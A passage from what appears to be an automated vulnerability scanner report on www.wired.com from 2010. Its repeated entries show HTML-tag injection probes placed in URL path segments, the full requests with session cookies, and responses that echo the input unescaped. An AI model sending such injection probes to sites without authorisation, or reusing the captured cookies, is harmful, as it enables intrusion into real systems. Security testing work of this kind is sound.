HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:06 GMT Date: Sun, 21 Nov 2010 23:11:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb4ac5"><a>19e070cbea0 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9c23"><a>3309dc6b8b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa9c23"><a>3309dc6b8b4/news/2007/09/dayintech_0904 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:22 GMT Date: Sun, 21 Nov 2010 23:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa9c23"><a>3309dc6b8b4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e49"><a>d02b8d3e523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news78e49"><a>d02b8d3e523/2007/09/dayintech_0904 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:32 GMT Date: Sun, 21 Nov 2010 23:11:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news78e49"><a>d02b8d3e523"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1916e"><a>0a35d8b532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science1916e"><a>0a35d8b532a/discoveries/news/2007/10/dayintech_1010 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:38 GMT Date: Sun, 21 Nov 2010 23:09:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science1916e"><a>0a35d8b532a ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884c7"><a>bb42abaa2dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries884c7"><a>bb42abaa2dc/news/2007/10/dayintech_1010 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:04 GMT Date: Sun, 21 Nov 2010 23:10:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries884c7"><a>bb42abaa2dc c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf412"><a>cb3677366bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newscf412"><a>cb3677366bf/2007/10/dayintech_1010 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:24 GMT Date: Sun, 21 Nov 2010 23:10:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newscf412"><a>cb3677366bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa58"><a>4fd1e10ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science1aa58"><a>4fd1e10ab82/discoveries/news/2007/11/dayintech_1105 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:34 GMT Date: Sun, 21 Nov 2010 23:09:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science1aa58"><a>4fd1e10ab82 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e2b"><a>c26500463e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries68e2b"><a>c26500463e9/news/2007/11/dayintech_1105 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:00 GMT Date: Sun, 21 Nov 2010 23:10:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries68e2b"><a>c26500463e9 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106cc"><a>40e21ea45df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news106cc"><a>40e21ea45df/2007/11/dayintech_1105 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:21 GMT Date: Sun, 21 Nov 2010 23:10:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news106cc"><a>40e21ea45df"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3f5"><a>0ed0fcf84fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2b3f5"><a>0ed0fcf84fd/discoveries/news/2007/11/dayintech_1112 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:30 GMT Date: Sun, 21 Nov 2010 23:09:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science2b3f5"><a>0ed0fcf84fd ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad12b"><a>fc633443f33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesad12b"><a>fc633443f33/news/2007/11/dayintech_1112 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:53 GMT Date: Sun, 21 Nov 2010 23:09:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesad12b"><a>fc633443f33 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483e8"><a>03a3277457 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news483e8"><a>03a3277457/2007/11/dayintech_1112 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:11 GMT Date: Sun, 21 Nov 2010 23:10:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news483e8"><a>03a3277457"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf3d"><a>d84d2d33c95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecdf3d"><a>d84d2d33c95/discoveries/news/2007/11/dayintech_1119 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:26 GMT Date: Sun, 21 Nov 2010 23:09:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecdf3d"><a>d84d2d33c95 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c14"><a>76302bf60a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese5c14"><a>76302bf60a4/news/2007/11/dayintech_1119 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:49 GMT Date: Sun, 21 Nov 2010 23:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese5c14"><a>76302bf60a4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b016"><a>8b57ac5dea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4b016"><a>8b57ac5dea6/2007/11/dayintech_1119 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:07 GMT Date: Sun, 21 Nov 2010 23:10:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news4b016"><a>8b57ac5dea6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab"><a>01007bb9cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science9d4ab"><a>01007bb9cc7/discoveries/news/2007/11/dayintech_1127 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:37 GMT Date: Sun, 21 Nov 2010 23:09:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science9d4ab"><a>01007bb9cc7 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a068"><a>8c766f25078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries5a068"><a>8c766f25078/news/2007/11/dayintech_1127 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:03 GMT Date: Sun, 21 Nov 2010 23:10:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries5a068"><a>8c766f25078 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d5e"><a>47d8c564ba0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news70d5e"><a>47d8c564ba0/2007/11/dayintech_1127 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:24 GMT Date: Sun, 21 Nov 2010 23:10:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news70d5e"><a>47d8c564ba0"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f65"><a>a1751845344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
